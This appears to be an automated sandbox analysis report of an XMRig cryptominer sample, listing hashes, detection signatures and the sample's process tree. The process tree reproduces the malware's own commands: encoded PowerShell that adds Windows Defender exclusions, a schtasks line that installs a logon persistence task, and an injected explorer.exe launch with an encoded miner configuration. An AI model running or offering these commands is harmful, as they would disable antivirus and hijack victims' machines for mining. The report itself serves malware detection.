Analysis
-
max time kernel
139s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
27/12/2024, 02:47
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe
-
Size
4.0MB
-
MD5
5fabb9965401cfb8a14fc634a427a98f
-
SHA1
5c20d202bb4f96ee6506f79a2a2e476ab8386790
-
SHA256
41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992
-
SHA512
af91d214cb7f4b069dfe03c448e56059ff19871fd756e463d47bea17804fec68062093694eb9d6c8418be17b07f9ea626fe57620d0c4379d70a3fb2c08ccc0ec
-
SSDEEP
98304:ZP4w9vjX7YYOls+UHVWvrZtePi5XCZE2VKI5CX:ZPZLsQpHVWvcpVKIY
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 16 IoCs
resource yara_rule behavioral1/memory/2468-68-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2468-72-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2468-70-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2468-75-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2468-66-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2468-64-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2468-62-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2468-60-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2468-58-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2468-56-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2468-76-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2468-81-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2468-80-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2468-79-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2468-78-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2468-82-0x0000000140000000-0x0000000140787000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
pid Process 2944 services.exe 2156 sihost64.exe -
Loads dropped DLL 2 IoCs
pid Process 2960 cmd.exe 2944 services.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 pastebin.com 5 pastebin.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2944 set thread context of 2468 2944 services.exe 46 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2084 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 41 IoCs
pid Process 2700 powershell.exe 2392 powershell.exe 1900 JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe 1908 powershell.exe 1276 powershell.exe 2944 services.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 2700 powershell.exe Token: SeDebugPrivilege 2392 powershell.exe Token: SeDebugPrivilege 1900 JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeDebugPrivilege 1276 powershell.exe Token: SeDebugPrivilege 2944 services.exe Token: SeLockMemoryPrivilege 2468 explorer.exe Token: SeLockMemoryPrivilege 2468 explorer.exe -
Suspicious use of WriteProcessMemory 49 IoCs
description pid Process procid_target PID 1900 wrote to memory of 1924 1900 JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe 30 PID 1900 wrote to memory of 1924 1900 JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe 30 PID 1900 wrote to memory of 1924 1900 JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe 30 PID 1924 wrote to memory of 2700 1924 cmd.exe 32 PID 1924 wrote to memory of 2700 1924 cmd.exe 32 PID 1924 wrote to memory of 2700 1924 cmd.exe 32 PID 1924 wrote to memory of 2392 1924 cmd.exe 33 PID 1924 wrote to memory of 2392 1924 cmd.exe 33 PID 1924 wrote to memory of 2392 1924 cmd.exe 33 PID 1900 wrote to memory of 2616 1900 JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe 35 PID 1900 wrote to memory of 2616 1900 JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe 35 PID 1900 wrote to memory of 2616 1900 JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe 35 PID 2616 wrote to memory of 2084 2616 cmd.exe 37 PID 2616 wrote to memory of 2084 2616 cmd.exe 37 PID 2616 wrote to memory of 2084 2616 cmd.exe 37 PID 1900 wrote to memory of 2960 1900 JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe 38 PID 1900 wrote to memory of 2960 1900 JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe 38 PID 1900 wrote to memory of 2960 1900 JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe 38 PID 2960 wrote to memory of 2944 2960 cmd.exe 40 PID 2960 wrote to memory of 2944 2960 cmd.exe 40 PID 2960 wrote to memory of 2944 2960 cmd.exe 40 PID 2944 wrote to memory of 1308 2944 services.exe 41 PID 2944 wrote to memory of 1308 2944 services.exe 41 PID 2944 wrote to memory of 1308 2944 services.exe 41 PID 1308 wrote to memory of 1908 1308 cmd.exe 43 PID 1308 wrote to memory of 1908 1308 cmd.exe 43 PID 1308 wrote to memory of 1908 1308 cmd.exe 43 PID 1308 wrote to memory of 1276 1308 cmd.exe 44 PID 1308 wrote to memory of 1276 1308 cmd.exe 44 PID 1308 wrote to memory of 1276 1308 cmd.exe 44 PID 2944 wrote to memory of 2156 2944 services.exe 45 PID 2944 wrote to memory of 2156 2944 services.exe 45 PID 2944 wrote to memory of 2156 2944 services.exe 45 PID 2944 wrote to memory of 2468 2944 services.exe 46 PID 2944 wrote to memory of 2468 2944 services.exe 46 PID 2944 wrote to memory of 2468 2944 services.exe 46 PID 2944 wrote to memory of 2468 2944 services.exe 46 PID 2944 wrote to memory of 2468 2944 services.exe 46 PID 2944 wrote to memory of 2468 2944 services.exe 46 PID 2944 wrote to memory of 2468 2944 services.exe 46 PID 2944 wrote to memory of 2468 2944 services.exe 46 PID 2944 wrote to memory of 2468 2944 services.exe 46 PID 2944 wrote to memory of 2468 2944 services.exe 46 PID 2944 wrote to memory of 2468 2944 services.exe 46 PID 2944 wrote to memory of 2468 2944 services.exe 46 PID 2944 wrote to memory of 2468 2944 services.exe 46 PID 2944 wrote to memory of 2468 2944 services.exe 46 PID 2944 wrote to memory of 2468 2944 services.exe 46 PID 2944 wrote to memory of 2468 2944 services.exe 46 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
-
C:\Windows\system32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2084
-
-
-
C:\Windows\system32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Users\Admin\AppData\Roaming\Microsoft\services.exeC:\Users\Admin\AppData\Roaming\Microsoft\services.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit4⤵
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"4⤵
- Executes dropped EXE
PID:2156
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe akovwilknylp0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRhyomsEanimzL+XPt/OnL5zkmhp4OKKV4oWMsUGWdwsoJudug7VIc6ebqddtMoL+8IBSLOtVFEJNctzsbAFCv5LFA0+pkqqr1nCx8fTFBuMw+OLiwo/SsR3rjZo+bft8oJOnArJgxMPdtfn3m4ICAAM3e2n70xyYsrZgv/mIjZ2s9MaWAVhE4vx5zxn4+fM4NxwQhCGRkaMVzSVPxkc4W4VUXCpA4yUlvFPRJn8S+yy9iUUpnGCywwE6cDcLt5DZIDXewj+xO4xE/aANwcdtidmwr0//85B+3VNT5iZiIC3FLzQE/vsUkNT9YQYUOQPjfBnjL7vzm5Q1ckI01V+0GBIlv+bX5ygP0xmeV9VgfPl4NZiC/LoM58JakN7IxZR/9DzCU+xTFYW50R3bR0l6IO+xdIhsG4X3v9YDNU15Qyz9+OxzSQEq5RCbfpWTpQuUofyKsvbLE9Jwpdr18PHoeiHN7tf8MAg8mUIkcnDa9CmC61qEDPq1VUv3vKJsXFBRAqNhhAwMRJW8JWGqkS4GgNVE5biRqbZhwaOTP6eEIlrQ==4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD50f48a6c97e49306c925ac8458ae12a29
SHA1e998d57b41260e2a42191baf99e024fc180c2d95
SHA256d549222dd1901a227b97d41bbe4027a616b91b3418d45f04119db66eccffee47
SHA512b707a9da0f0589b5be0c8fbcc1cf5707cf2e8c59ad88eaf42c3d90c869a57780bbc2ca6aaa9f94925fcd7cb511a2965973b58fb2f731d8e6128dc40bb333cd0a
-
Filesize
4.0MB
MD55fabb9965401cfb8a14fc634a427a98f
SHA15c20d202bb4f96ee6506f79a2a2e476ab8386790
SHA25641e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992
SHA512af91d214cb7f4b069dfe03c448e56059ff19871fd756e463d47bea17804fec68062093694eb9d6c8418be17b07f9ea626fe57620d0c4379d70a3fb2c08ccc0ec
-
Filesize
9KB
MD58fdd61447409b34bff375dd0e988bb49
SHA1c8585a53aa833147e4082bef04e401aac0c7c6b1
SHA2562a8e0532e8255342e6599696a3d354cfde8b511a740427e6c7a37c6970f8f394
SHA51279fb098910623ba48ab0ff94bbac67f0126b84ffe692c2b3b07bd4cbc3a1ef3787285c870e6f2d3c0b20608903bc4f6625aa2343031afc27057e1d4bece8d337